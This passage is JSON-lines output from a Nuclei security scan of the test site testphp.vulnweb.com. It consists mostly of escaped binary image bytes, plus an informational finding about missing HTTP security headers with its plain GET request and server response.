fffd\\u003c\\ufffd\\\",c\\ufffd\\ufffdJ)c\\ufffd!|\\u000c\\ufffdg\\ufffd\\u0001\\ufffd\\ufffd\\ufffd%\\ufffd\\u000f\\ufffd\\ufffdm!xo\\ufffd\\u0000\\ufffd\\\\\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffd\\u003cU\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\r\\ufffd\\ufffdOG\\u0019\\ufffdD\\ufffd3\\ufffdF|\\ufffdi\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\r\\u001fv\\ufffd\\ufffdX;\\ufffd\\ufffdh{\\ufffd\\ufffd\\ufffd\\\\\\u0005]\\ufffdrJ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffd;!\\ufffd\\ufffd\\\"\\ufffdv\\ufffdz\\ufffdV+\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffdV\\ufffd\\ufffd\\ufffdxRV=Ѝ\\ufffd\\u0004\\ufffd\\ufffdD\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\u0015$\\ufffdM\\ufffd\\ufffd:\\u0003\\ufffdT\\ufffd\\ufffd\\ufffdۜ\\ufffd\\ufffd[;\\ufffd\\u0010IfR\\ufffdN\\u000b\\u001e[\\ufffd\\u0006p\\u003ch\\ufffd)\\ufffd#Ս\\u000fo|\\ufffd\\u0010e:\\ufffd|\\ufffd\\u0011\\ufffd\\ufffdc\\ufffd\\ufffd\\u0010\\ufffd}\\ufffduf\\ufffd\\u000cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-Mgj\\u0026bx\\u0003?MA\\ufffd\\ufffde\\u000c$\\ufffdH$\\u001c4r.\\ufffdS\\ufffdy\\u0007\\ufffd\\u001f\\ufffd\\ufffdt\\ufffd\\u0007\\ufffd:\\ufffdc\\ufffdyo\\u0018\\u001a\\u0005\\\"\\ufffd\\ufffd\\u001b\\ufffd\\ufffd5c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\u000e\\u000f\\ufffd\\ufffdЕ\\\\\\ufffdT\\ufffd\\ufffd[N\\ufffd\\ufffd;\\ufffd\\ufffd*\\ufffdi\\ufffd\\ufffdU\\ufffd\\u0000e\\ufffd$c \\ufffdyʰP\\ufffd\\ufffd[\\u00168\\ufffd\\ufffd\\u0014\\u0014o\\ufffd\\u003c=\\u0013\\ufffdSG\\u001f\\u000c\\ufffd3\\ufffd\\u0002|ꅪ袞W\\ufffd\\ufffdZр\\ufffd;\\ufffd\\u001e\\u0018{6\\u003ed?\\ufffd\\u0006\\u001b\\ufffd\\ufffd\\ufffd\\ufffd}_\\ufffd\\ufffdY\\u001fn\\ufffdR\\ufffdH\\u0003,sQwx`\\u0000;\\u001dH \\ufffd\\u0018\\ufffd\\ufffd\\u0004{\\u001d\\u0015^\\ufffdn\\ufffd\\ufffd\\ufffdvJ\\ufffd=\\u001a\\u001b\\ufffdD\\ufffd\\ufffd2mٖ*@E\\u0001\\ufffd*\\u000cP\\u0007\\ufffdF2F\\ufffdnW8\\ufffd\\u000c' \\ufffdd\\u001d\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdo\\u0017Q\\ufffd[t\\u000f\\ufffdj\\ufffd\\ufffd\\ufffde\\u0013R\\ufffdOGN\\ufffdݎ\\ufffd\\u0011\\u001231J\\ufffd!US\\ufffd2\\u0008\\ufffd\\ufffdr\\t'ZM\\ufffd\\ufffdYx\\ufffd\\ufffdd\\u0011\\ufffd\\ufffdW\\ufffdY\\ufffd*e_F\\u0019\\u0015\\ufffd\\ufffdh\\ufffd\\ufffdK\\u0002\\ufffd\\ufffd\\ufffdIпº\\ufffdT\\r;\\ufffdf\\ufffd\\ufffd\\ufffdQ+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd;{{\\ufffd\\u0000g\\ufffd\\u00060\\ufffdc\\ufffdt۽eB[n]\\ufffdI\\ufffd\\ufffdPc\\u000b\\u0018\\u0007\\u0001pp\\u000f\\ufffd\\u00089\\ufffd\\ufffd\\ufffd\\ufffd\\u0005d\\ufffd\\u0013?\\ufffd\\ufffd\\u0001\\ufffd\\ufffds\\ufffd\\ufffd׿\\ufffd4T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|J\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\u0015\\ufffd6\\ufffd\\ufffd\\ufffdi\\u0016)\\ufffd\\ufffd\\ufffd\\u0001e\\ufffd\\ufffdrB\\ufffd\\u0007\\ufffd\\ufffd\\u000c\\u0002\\u00179\\u0004\\u0003\\ufffdz:\\ufffd\\ufffd\\ufffdG/e@\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffdj\\ufffd\\ufffd=\\u00038P?P\\ufffd\\ufffd\\u003e\\u0017\\u001bpwj\\ufffd\\ufffd\\u0015l7\\u001b\\u001d\\ufffd\\u000b\\ufffd(\\ufffd\\ufffd\\u0011\\u0011hX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:41.416109911Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 